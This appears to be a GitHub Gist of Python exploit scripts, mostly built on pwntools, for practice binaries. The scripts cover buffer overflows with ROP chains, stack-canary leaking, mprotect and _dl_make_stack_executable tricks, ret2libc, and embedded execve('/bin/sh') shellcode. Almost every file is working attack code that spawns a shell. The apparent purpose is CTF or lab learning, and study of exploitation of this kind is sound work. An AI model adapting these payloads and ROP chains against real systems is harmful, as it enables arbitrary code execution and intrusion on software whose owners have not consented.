Last active
January 11, 2018 09:18
-
-
Save veeeeeeeeeee/6cfde29210f3c4de1ed4fcbe43ec8e98 to your computer and use it in GitHub Desktop.
ROP
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| from pwn import * | |
| import struct, sys | |
| p = process("./ret2stack") | |
| nop_sled = '\x90' * 16 | |
| shellcode = '\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xd2\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xc0\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05\x6a\x01\x5f\x6a\x3c\x58\x0f\x05' | |
| rbp = 0x0000000000401690 | |
| #gadgets | |
| pop_rsi = 0x0000000000401717 | |
| pop_rax = 0x000000000043356c | |
| mov_rsi = 0x0000000000462491 | |
| pop_rdi = 0x00000000004005c5 | |
| #push_rsp = 0x0000000000459000 | |
| jmp_rsp = 0x000000000048c52b | |
| #_dl_make_stack_executable | |
| stack_prot = 0x00000000006b1f80 | |
| libc_stack_end = 0x00000000006b1f30 | |
| dl_make_stack = 0x0000000000462cb0 | |
| #pop rsi; ret | |
| #[stack_prot] | |
| #pop rax; ret | |
| #0x7 | |
| #mov qword [rsi], rax; ret | |
| #pop rdi; ret | |
| #libc_stack_end | |
| #dl_make_stack_executable | |
| payload = 'A' * 64 + p64(rbp) | |
| payload += p64(pop_rsi) # pop rsi; ret | |
| payload += p64(stack_prot) # __stack_prot | |
| payload += p64(pop_rax) # pop rax; ret | |
| payload += p64(0x7) | |
| payload += p64(mov_rsi) # mov qword ptr [rsi], rax; ret | |
| payload += p64(pop_rdi) # pop rdi; ret | |
| payload += p64(libc_stack_end) # __libc_stack_end | |
| payload += p64(dl_make_stack) # _dl_make_stack_executable | |
| #payload += p64(push_rsp) # push rsp; ret | |
| payload += p64(jmp_rsp) # jmp rsp; ret | |
| payload += shellcode | |
| p.send(payload) | |
| p.interactive() | |
| #f = open("tmp", "w") | |
| #f.write(payload) | |
| #f.close() |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # using strcpy and system - @plt approach | |
| import struct | |
| import os | |
| # objdump -d or gdb | |
| strcpy = 0x080482e0 | |
| system = 0x080482f0 | |
| # ROPgadget --binary a.out --memstr "sh;" | |
| char_s = 0x08048142 | |
| char_h = 0x080482e6 | |
| char__ = 0x080484ef | |
| # objdump -x a.out | grep bss | |
| bss = 0x08049748 | |
| #objdump -d | |
| ppr = 0x080484da | |
| payload = 'A' * 1036 | |
| payload += struct.pack("<L", strcpy) | |
| payload += struct.pack("<L", ppr) | |
| payload += struct.pack("<L", bss) | |
| payload += struct.pack("<L", char_s) | |
| payload += struct.pack("<L", strcpy) | |
| payload += struct.pack("<L", ppr) | |
| payload += struct.pack("<L", bss+0x1) | |
| payload += struct.pack("<L", char_h) | |
| payload += struct.pack("<L", strcpy) | |
| payload += struct.pack("<L", ppr) | |
| payload += struct.pack("<L", bss+0x2) | |
| payload += struct.pack("<L", char__) | |
| payload += struct.pack("<L", system) | |
| payload += 'AAAA' | |
| payload += struct.pack("<L", bss) | |
| os.system("./aslr \"%s\"" % payload) | |
| #print payload | |
| # leaking GOT - rewrite plt function into read approach |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| from pwn import * | |
| import struct, sys | |
| leak_payload = "A" * 24 + "\n" | |
| p = process("./start") | |
| p.send(leak_payload) | |
| p.recvline() | |
| r = p.recv() | |
| canary = struct.unpack("<Q", "\x00" + r[0:7])[0] | |
| print "canary: " + hex(canary) | |
| #payload = "exit\n" + 'A' * 19 + struct.pack("<Q", canary) + 'A' * 100 | |
| #payload = "exit\n" + 'A' * 100 | |
| shellcode = '\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xd2\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xc0\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05\x6a\x01\x5f\x6a\x3c\x58\x0f\x05' | |
| rbp = 0x00000000006cc018 | |
| #bypassed canary | |
| payload = "exit\n" + 'A' * 19 + struct.pack("<Q", canary) + p64(rbp) | |
| pop_rsi = 0x00000000004017f7 # pop rsi; ret | |
| mov_rsi = 0x0000000000475fc1 # mov qword ptr [rsi], rax; ret | |
| mov_rax = 0x000000000041e450 # mov rax, rsi; ret | |
| pop_rdi = 0x00000000004005d5 # pop rdi; ret | |
| jmp_rsp = 0x00000000004a554f # jmp rsp | |
| stack_prot = 0x00000000006cbfe0 | |
| libc_stack_end = 0x00000000006cbf90 | |
| dl_make_stack = 0x00000000004768a0 | |
| #pop rsi; ret | |
| #[stack_prot] | |
| #pop rax; ret | |
| #0x7 | |
| #mov qword [rsi], rax; ret | |
| #pop rdi; ret | |
| #libc_stack_end | |
| #dl_make_stack_executable | |
| payload += p64(pop_rsi) # pop rsi; ret | |
| payload += p64(0x7) | |
| payload += p64(mov_rax) # mov rax, rsi; ret | |
| payload += p64(pop_rsi) | |
| payload += p64(stack_prot) | |
| payload += p64(mov_rsi) # mov qword [rsi], rax; ret | |
| payload += p64(pop_rdi) # pop rdi; ret | |
| payload += p64(libc_stack_end) | |
| payload += p64(dl_make_stack) | |
| payload += p64(jmp_rsp) # jmp rsp | |
| payload += shellcode | |
| p.send(payload) | |
| p.interactive() |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # no aslr | |
| # find /bin/sh via gdb-peda | |
| # rop chain | |
| # dup2(4, 0) | |
| payload += p64 (pop_rax) | |
| payload += p64 (33) # dup2 syscall | |
| payload += p64 (pop_rdi) | |
| payload += p64 (4) | |
| payload += p64 (pop_rsi_r15) | |
| payload += p64 (0) | |
| payload += p64 (0xdeadbeef1) | |
| payload += p64 (syscall) | |
| # execve | |
| payload += p64 (pop_rdi) | |
| payload += p64 (sh_addr) # found in libc | |
| payload += p64 (pop_rsi_r15) | |
| payload += p64 (0x6020e0) # address of 0 bytes | |
| payload += p64 (0xdeadbeef4) | |
| payload += p64 (pop_rax) | |
| payload += p64 (59) | |
| payload += p64 (syscall) # execute execve() | |
| payload += p64 (0x41414141) # in case failure |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| import struct | |
| import os | |
| # objdump -d ./rop | |
| # find pop %reg ; ret | |
| # find pop %reg ; pop %reg ; ret | |
| # gdb, i func | |
| pop_ret = 0x08048586 | |
| pop2_ret = 0x0804856a | |
| exec_string = 0x0804841b | |
| add_bin = 0x08048434 | |
| add_sh = 0x08048470 | |
| # what if ASLR? | |
| # metasploit pattern create and pattern offset to find buffer size | |
| payload = 'A' * 112 | |
| payload += struct.pack("I", add_bin) # function address | |
| payload += struct.pack("I", pop_ret) # gadget | |
| payload += struct.pack("I", 0xdeadbeef) # function arg | |
| payload += struct.pack("I", add_sh) #function address | |
| payload += struct.pack("I", pop2_ret) # gadgets | |
| payload += struct.pack("I", 0xcafebabe) # arg | |
| payload += struct.pack("I", 0xbadf00d) # arg | |
| payload += struct.pack("I", exec_string) #function address | |
| os.system("./rop \"%s\"" % payload) #execute |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # mprotect into reading shellcode from stdin | |
| #!/usr/bin/env python | |
| import struct | |
| import os | |
| from pwn import * | |
| shellcode = "\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xd2\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xc0\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05\x6a\x01\x5f\x6a\x3c\x58\x0f\x05" | |
| # using ROPgadget | |
| stack_addr = 0x00000000006b1000 # stack addr | |
| pop_rax = 0x0000000000414004 # pop rax; ret | |
| pop_rdi = 0x0000000000400595 # pop rdi; ret | |
| pop_rsi = 0x00000000004016b7 # pop rsi; ret | |
| pop_rdx = 0x00000000004349e5 # pop rdx; ret | |
| syscall = 0x0000000000455be5 # syscall; ret | |
| xor_rax = 0x000000000041a00f # xor rax; ret | |
| add_rax = 0x00000000004550a0 # add rax, 1; ret | |
| payload = 'A' * 280 | |
| #payload += p64(pop_rax) | |
| #payload += p64(10) # call mprotect | |
| ######## | |
| payload += p64(xor_rax) # rax = 0 | |
| payload += p64(add_rax) * 10 # rax = 10 for syscall mprotect | |
| # mprotect (void *addr, size_t len, int protec) | |
| # syscall %rax - %rdi, %rsi, %rdx | |
| payload += p64(pop_rdi) | |
| payload += p64(stack_addr) | |
| payload += p64(pop_rsi) | |
| payload += p64(200) # buffer size to change | |
| payload += p64(pop_rdx) | |
| payload += p64(7) # rwx | |
| payload += p64(syscall) | |
| ######## | |
| payload += p64(xor_rax) # rax = 0 for syscall read() | |
| # read (int fd, void *buf, size_t count) | |
| # %rdi, %rsi, %rdx | |
| payload += p64(pop_rdi) | |
| payload += p64(0) # read from stdin | |
| payload += p64(pop_rsi) | |
| payload += p64(stack_addr) | |
| payload += p64(pop_rdx) | |
| payload += p64(200) | |
| payload += p64(syscall) | |
| payload += p64(stack_addr) | |
| p = process("./rop") | |
| p.sendline(payload) | |
| time.sleep(0.06) | |
| p.sendline(shellcode) | |
| p.interactive() | |
| #print payload | |
| #print shellcode |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # value to write | |
| pop rax; ret | |
| data | |
| # mem location where we want to write the value | |
| pop rdx; ret | |
| location + 8 # x64 | |
| # write rax at memory location indicated by rdx | |
| mov ptr [rdx], rax; ret | |
| 0xdeadbeef1 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| def write2mem(data, loc, chain): | |
| chain += p64 (0x0000000000400c91) # pop rax ; ret ; | |
| chain += p64 (data) | |
| chain += p64 (0x00000000004009a0) # pop rbp ; ret ; | |
| chain += p64 (location + 8) | |
| chain += p64 (0x0000000000400c8e) # mov dword ptr [rbp-8], eax; pop rax; ret; | |
| chain += p64 (0xdeadbeef1) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| from pwn import * | |
| payload = 'A' * 88 | |
| # ROPgadget --binary ret2libc | |
| # 0x555555554000 + found_addr | |
| payload += p64(0x555555554803) # pop rdi; ret | |
| # libc | |
| payload += p64(0x7ffff7b9c819) # /bin/sh | |
| payload += p64(0x7ffff7a7a450) # __libc_system | |
| p = process("./ret2libc") | |
| p.sendline(payload) | |
| p.interactive() | |
| #print payload |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment